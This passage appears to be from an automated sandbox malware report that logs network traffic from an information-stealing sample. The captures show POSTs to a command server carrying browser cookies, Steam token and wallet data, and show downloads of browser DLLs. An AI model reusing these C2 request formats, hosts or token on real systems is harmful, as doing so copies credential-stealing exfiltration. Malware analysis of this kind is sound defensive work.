Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.172.128.150Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.172.128.150Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file"------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.150Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file"------BGDAAEHDHIIJKECBKEBA--
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.172.128.150Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 185.172.128.150Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="message"wallets------GHCAKKEGCAAFHJJJDBKJ--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.150Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"files------BGDAAEHDHIIJKECBKEBA--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKJJDHCGCAECAAECFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFCAFCBKFHJJJKKFHIHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEGHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.172.128.150Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFHCBFHDHCAAKFHDGDHost: 185.172.128.150Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 48 43 42 46 48 44 48 43 41 41 4b 46 48 44 47 44 2d 2d 0d 0a Data Ascii: ------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBAFHCBFHDHCAAKFHDGDContent-Disposition: form-data; name="file"------EBAFHCBFHDHCAAKFHDGD--
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 152955Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 185.172.128.150Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"jbdtaijovg------DBKEHDGDGHCBGCAKFIII--
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View IP Address: 185.172.128.228 185.172.128.228
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.59
